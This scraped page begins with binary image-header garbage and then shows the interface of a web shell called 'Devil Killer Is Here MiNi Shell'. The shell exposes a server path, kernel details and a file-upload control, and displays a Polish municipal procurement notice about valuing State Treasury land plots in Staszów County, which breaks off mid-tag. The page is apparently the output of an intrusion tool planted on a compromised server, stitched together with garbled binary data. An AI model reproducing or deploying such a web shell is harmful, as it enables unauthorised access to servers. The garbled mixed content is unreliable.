JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250916/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250916/0042477601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Wykonanie operatów szacunkowych określających wartość nieruchomości Skarbu Państwa realizowane w dwóch zadaniach” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Staszowski - Starostwo Powiatowe</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 830409241</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Józefa Piłsudskiego 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Staszów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">28-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL722 - Sandomiersko-jędrzejowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">powiat@staszowski.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.staszowski.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Wykonanie operatów szacunkowych określających wartość nieruchomości Skarbu Państwa realizowane w dwóch zadaniach” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7da3357c-58f9-4fa6-ba08-92dd6479b79f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00424776</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00065208/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.9 Wycena nieruchomości</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.staszowski.eu <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu platformy zakupowej https://platformazakupowa.pl/pn/staszowski Zamawiający dopuszcza,<br/>awaryjnie komunikację za pośrednictwem poczty elektronicznej<br/>powiat@staszowski.eu. - Szczegółowa instrukcja dla Wykonawców dotycząca złożenia, zmiany i wycofania oferty znajduje się na<br/>stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu w tym<br/>składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z<br/>uwzględnieniem wyjątków określonych w ustawie Pzp., odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki<br/>komunikacji elektronicznej rozumie się środki komunikacji elektronicznej<br/>zdefiniowane w ustawie z dnia 3 marca 2020 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344). 2. Ofertę,<br/>oświadczenia, o których mowa w art. 125 ust. 1 Pzp, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu<br/>udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w<br/>szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a także oświadczenie o jakim mowa w Rozdziale X ust. 1 SWZ<br/>składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym.3. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się<br/>przy użyciu platformy zakupowej ttps://platformazakupowa.pl/pn/staszowski Zamawiający dopuszcza, awaryjnie komunikację za<br/>pośrednictwem poczty elektronicznej powiat@staszowski.eu<br/>4. Szczegółowa instrukcja dla Wykonawców dotycząca złożenia, zmiany i wycofania oferty znajduje się na stronie internetowej pod<br/>adresem: https://platformazakupowa.pl/strona/45-instrukcje<br/>Szczegółowe informacje określa SWZ w rozdziale XIII SPOSÓB KOMUNIKACJI ORAZ WYJAŚNIENIA TREŚCI SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „Rozporządzenie”, informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Starosta Staszowski, ul. Józefa Piłsudskiego 7, 28-200 Staszów, tel. 15 864<br/>2765 2. W sprawach z zakresu ochrony danych osobowych mogą Państwo kontaktować się z Inspektorem Ochrony Danych pod<br/>adresem e-mail: inspektor@cbi24.pl<br/>3. Dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego.<br/>4. Dane osobowe będą przetwarzane przez okres zgodnie z art. 78 ust. 1 i 4 ustawy z dnia z dnia 11 września 2019 r.– Prawo<br/>zamówień publicznych (t.j. Dz. U. z 2024 r. poz. 1320 ze zm.), zwanej dalej PZP, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania<br/>obejmuje cały czas obowiązywania umowy.<br/>5. Podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. c) ww. Rozporządzenia w związku z przepisami Pzp.<br/>6. Odbiorcami Pani/Pana danych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o<br/>art. 18 oraz art. 74 ust. 4 Pzp.<br/>7. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach Pzp, związanym<br/>z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Pzp.<br/>8. Osoba, której dane dotyczą ma prawo do:<br/>- dostępu do treści swoich danych oraz możliwości ich poprawiania, sprostowania, ograniczenia przetwarzania,<br/>- w przypadku gdy przetwarzanie danych odbywa się z naruszeniem przepisów Rozporządzenia służy prawo wniesienia skargi do<br/>organu nadzorczego tj. Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa,<br/>9. Osobie, której dane dotyczą nie przysługuje:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e Rozporządzenia prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia;<br/>- na podstawie art. 21 Rozporządzenia prawo sprzeciwu, wobec przetwarzania danych osobowych.<br/>10. W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 Rozporządzenia, wymagałoby niewspółmiernie<br/>dużego wysiłku, Administrator może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego.<br/>11. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym<br/>mowa w art. 16 Rozporządzenia, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub<br/>konkursu ani zmianą postanowień umowy w zakresie niezgodnym z Pzp.<br/>12. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 Rozporządzenia, nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia postępowania o udzielenie zamówienia publicznego.<br/>13. W przypadku danych osobowych zamieszczonych przez Administratora w Biuletynie Zamówień Publicznych, prawa, o których<br/>mowa w art. 15 i art. 16 Rozporządzenia,<br/>są wykonywane w drodze żądania skierowanego do Administratora.<br/>14. Od dnia zakończenia postępowania o udzielenie zamówienia, w przypadku gdy wniesienie żądania, o którym mowa w art. 18 ust.<br/>1 Rozporządzenia, spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole i załącznikach do protokołu,<br/>Administrator nie udostępnia tych danych zawartych w protokole<br/>i w załącznikach do protokołu, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 Rozporządzenia.<br/>Cd. w SWZ rozdział II II. OCHRONA DANYCH OSOBOWYCH</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZ-IV.GN.272.14.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 1: Wycena nieruchomości gruntowych Skarbu Państwa oddanych <br/>w użytkowanie wieczyste, położonych w gminie Staszów, Połaniec, Osiek, Rytwiany <br/><br/>Wykonanie operatów szacunkowych określających wartość prawa własności<br/>15 nieruchomości gruntowych Skarbu Państwa położonych:<br/>•	w Staszowie, oznaczonej w ewidencji gruntów numerem działki 5970/2 o pow. <br/>0,4352 ha,<br/>•	w gminie Staszów obręb Grzybów, oznaczonych w ewidencji gruntów numerami działek:<br/>	1337/2 o pow. 0,5121 ha,<br/>	1338/5 o pow. 0,2680 ha,<br/>	1315 o pow. 0,6400 ha,<br/>	1313/9 o pow. 0,0300 ha,<br/>	1337/3, 1337/4 o łącznej pow. 1,1452 ha,<br/>	1303/1, 1303/2 o łącznej pow. 1,6200 ha,<br/>	952/8 o pow. 0,1446 ha,<br/>	910/2, 911/2 o łącznej pow. 1,4164 ha,<br/>•	w gminie Połaniec, obręb Zawada, oznaczonej w ewidencji gruntów numerem działki 199/1 o pow. 0,3302 ha,<br/>•	w gminie Połaniec, obręb Brzozowa, oznaczonej w ewidencji gruntów numerami działek: 343, 350/1, 351/1 453, 461, 463/1, 463/2, 465, 604/3, 605/3, 607/1, 607/3, 608/1, 608/3, 625/4, 627/2, 630/4, 632/4, 633/2, 635/2, 668/1, 670/1, 679/1, 679/2, 608/5, 672/3, 673/5, 674/4, 674/5, 675/4 o łącznej pow. 7,9623 ha, <br/>•	w gminie Połaniec, obręb Łęg, oznaczonej w ewidencji gruntów numerami działek: 193/3, 202/3, 204/4, 204/6, 208/4 209/1, 407/4, 189/4, 197/3, 199/1, 332/1, 333/1, 466/1, 467/1, 468/1, 872/1, 371/5, 358/16, 502/3, 890, 891, 892, 902 o łącznej pow. 5,0317 ha,<br/>•	w gminie Osiek, obręb Ossala, oznaczonej w ewidencji gruntów numerem działki 669 o pow. 0,2100 ha,<br/>•	w gminie Rytwiany, obręb Strzegomek, oznaczonej w ewidencji gruntów numerem działki 180/3 o pow. 0,6203 ha,<br/>•	w Połańcu, oznaczonych numerami działek: 5869/8, 6485/1 o pow. 0,0140 ha oraz <br/>w gminie Połaniec obręb Łęg, oznaczonej w ewidencji gruntów numerem działki 371/6 o pow.0,0044 ha<br/>w celu aktualizacji opłaty rocznej z tytułu użytkowania wieczystego.<br/>Przedmiot zamówienia powinien być wykonany zgodnie z obowiązującymi przepisami prawa oraz standardami zawodowymi rzeczoznawców majątkowych.<br/> Stosownie do art. 95 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (tj. Dz. U. z 2024 r. poz. 1320 ze zm.), nie ma żadnych czynności, które wymagają zatrudnienia przez Wykonawcę na podstawie umowy o pracę osób wykonujących wskazane przez „Zamawiającego” czynności w zakresie realizacji zamówienia. <br/>Nazwa i kod Wspólnego Słownika Zamówień: <br/>70.00.00.00-1 Usługi w zakresie nieruchomości. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">70000000-1 - Usługi w zakresie nieruchomości</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Na podstawie kryteriów oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 2: Wycena nieruchomości gruntowych Skarbu Państwa oddanych <br/>w użytkowanie wieczyste położonych w Staszowie<br/>Wykonanie operatów szacunkowych określających wartość prawa własności 124 nieruchomości gruntowych Skarbu Państwa położonych w Staszowie, oznaczonych <br/>w ewidencji gruntów numerami działek: <br/>5924/11 o pow. 0,0023 ha, 5924/20 o pow. 0,0020 ha, 5924/21 o pow. 0,0020 ha, <br/>5924/23 o pow. 0,0020 ha, 5809/22 o pow. 0,0023 ha, 5809/23, 5809/24, 5809/28, 5809/29 <br/>o łącznej pow. 0,0080 ha, 5805/50 o pow. 0,0122 ha, 5809/25 o pow. 0,0019 ha, 5809/26 <br/>o pow. 0,0019 ha, 5809/27 o pow. 0,0020 ha, 5809/31 o pow. 0,0019 ha, 5809/32 o pow. 0,0020 ha, 5809/30 o pow. 0,0020 ha, 6193/1 o pow. 0,0032 ha, 6193/2 o pow. 0,0027 ha,<br/>6193/3 o pow. 0,0024 ha, 6193/4 o pow. 0,0029 ha, 6193/5 o pow. 0,0025 ha, <br/>6193/8 o pow. 0,0025 ha, 6193/9 o pow. 0,0025 ha, 6193/10 o pow. 0,0024 ha, <br/>6193/12 o pow. 0,0025 ha, 6193/13 o pow. 0,0024 ha, 6193/14 o pow. 0,0026 ha,<br/>6193/18 o pow. 0,0024 ha, 6193/19 o pow. 0,0024 ha, 6193/21 o pow. 0,0025 ha,<br/>6193/22 o pow. 0,0025 ha, 6193/23 o pow. 0,0026 ha, 6193/26 o pow. 0,0022 ha,<br/>6193/27 o pow. 0,0022 ha, 6193/28 o pow. 0,0022 ha, 6193/29 o pow. 0,0022 ha, <br/>6193/30 o pow. 0,0021 ha, 6193/31 o pow. 0,0022 ha, 6193/32 o pow. 0,0022 ha,<br/>6193/33 o pow. 0,0023 ha, 6193/34 o pow. 0,0021 ha, 6193/35 o pow. 0,0022 ha, <br/>6193/36 o pow. 0,0022 ha, 6193/37 o pow. 0,0021 ha, 6193/39 o pow. 0,0020 ha, <br/>6193/40 o pow. 0,0020 ha, 6193/41 o pow. 0,0020 ha, 6193/42 o pow. 0,0020 ha, <br/>6193/43 o pow. 0,0020 ha, 6193/44 o pow. 0,0020 ha, 6193/45 o pow. 0,0020 ha, <br/>6193/46 o pow. 0,0021 ha, 6193/47 o pow. 0,0024 ha, 6193/48 o pow. 0,0026 ha, <br/>6193/49 o pow. 0,0033 ha, 6193/53 o pow. 0,0028 ha, 6193/55 o pow. 0,0027 ha, <br/>6193/56, 6193/57 o łącznej pow. 0,0053 ha, <br/>6193/58 o pow. 0,0026 ha, 6193/59 o pow. 0,0026 ha, 6193/60 o pow. 0,0020 ha, <br/>6193/62 o pow. 0,0019 ha, 6193/63 o pow. 0,0019 ha, 6193/64 o pow. 0,0022 ha, <br/>6193/65 o pow. 0,0021 ha, 6193/66 o pow. 0,0021 ha, 6193/67, 6193/137 o łącznej <br/>pow. 0,0042 ha, 6193/68, 6193/118 o łącznej pow. 0,0042 ha, 6193/69 o pow. 0,0023 ha, 6193/70 o pow. 0,0029 ha, 6193/71 o pow. 0,0022 ha, 6193/72 o pow. 0,0021 ha, <br/>6193/73 o pow. 0,0021 ha, 6193/74 o pow. 0,0022 ha, 6193/75 o pow. 0,0023 ha, <br/>6193/76 o pow. 0,0020 ha, 6193/78 o pow. 0,0020 ha, 6193/79 o pow. 0,0021 ha,<br/>6193/80 o pow. 0,0026 ha, 6193/81, 6193/129, 6193/130 o łącznej pow. 0,0101 ha, <br/>6193/82 o pow. 0,0027 ha, 6193/83 o pow. 0,0027 ha, 6193/84 o pow. 0,0026 ha, <br/>6193/85 o pow. 0,0029 ha, 6193/87 o pow. 0,0031 ha, 6193/88 o pow. 0,0022 ha, <br/>6193/89 o pow. 0,0020 ha, 6193/90 o pow. 0,0020 ha, 6193/91 o pow. 0,0020 ha, <br/>6193/92 o pow. 0,0020 ha, 6193/93 o pow. 0,0020 ha, 6193/94 o pow. 0,0019 ha,<br/>6193/95 o pow. 0,0019 ha, 6193/96 o pow. 0,0019 ha, 6193/97 o pow. 0,0019 ha, <br/>6193/98 o pow. 0,0020 ha, 6193/99 o pow. 0,0020 ha, 6193/100 o pow. 0,0020 ha, <br/>6193/101 o pow. 0,0020 ha, 6193/102 o pow. 0,0021 ha, 6193/103 o pow. 0,0020 ha, 6193/104 o pow. 0,0021 ha, 6193/105, 6193/106 o łącznej pow. 0,0060 ha, 6193/107 o pow. 0,0020 ha, 6193/108 o pow. 0,0020 ha, 6193/112 o pow. 0,0020 ha, 6193/113 <br/>o pow. 0,0020 ha, 6193/114 o pow. 0,0019 ha, 6193/115 o pow. 0,0019 ha, <br/>6193/116 o pow. 0,0019 ha, 6193/120 o pow. 0,0019 ha, 6193/121 o pow. 0,0019 ha, 6193/122 o pow. 0,0019 ha, 6193/123 o pow. 0,0025 ha, 6193/125 o pow. 0,0033 ha, 6193/126 o pow. 0,0023 ha, 6193/127 o pow. 0,0030 ha, 6193/128 o pow. 0,0031 ha, 6193/131 o pow. 0,0036 ha, 6193/136 o pow. 0,0026 ha, 6193/138 o pow. 0,0021 ha, <br/>6193/6, 6193/7, 6193/15, 6193/16, 6193/24, 6193/38, 6193/51, 6193/61, 6193/117, 6193/119, 6193/133 o łącznej pow. 0,2283 ha, 6193/50 o pow. 0,1050 ha, 6193/52 o pow. 0,0552 ha, 6193/86 o pow. 0,0444 ha, 6193/124 o pow. 0,0227 ha, 6193/134 o pow. 0,0114 ha <br/>w celu aktualizacji opłaty rocznej z tytułu użytkowania wieczystego.<br/>Przedmiot zamówienia powinien być wykonany zgodnie z obowiązującymi przepisami prawa oraz standardami zawodowymi rzeczoznawców majątkowych.<br/>Stosownie do art. 95 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (tj. Dz. U. z 2024 r. poz. 1320 ze zm.) nie ma żadnych czynności, które wymagają zatrudnienia przez Wykonawcę na podstawie umowy o pracę osób wykonujących wskazane przez „Zamawiającego” czynności w zakresie realizacji zamówienia. <br/>Nazwa i kod Wspólnego Słownika Zamówień: <br/>70.00.00.00-1 Usługi w zakresie nieruchomości. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">70000000-1 - Usługi w zakresie nieruchomości</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 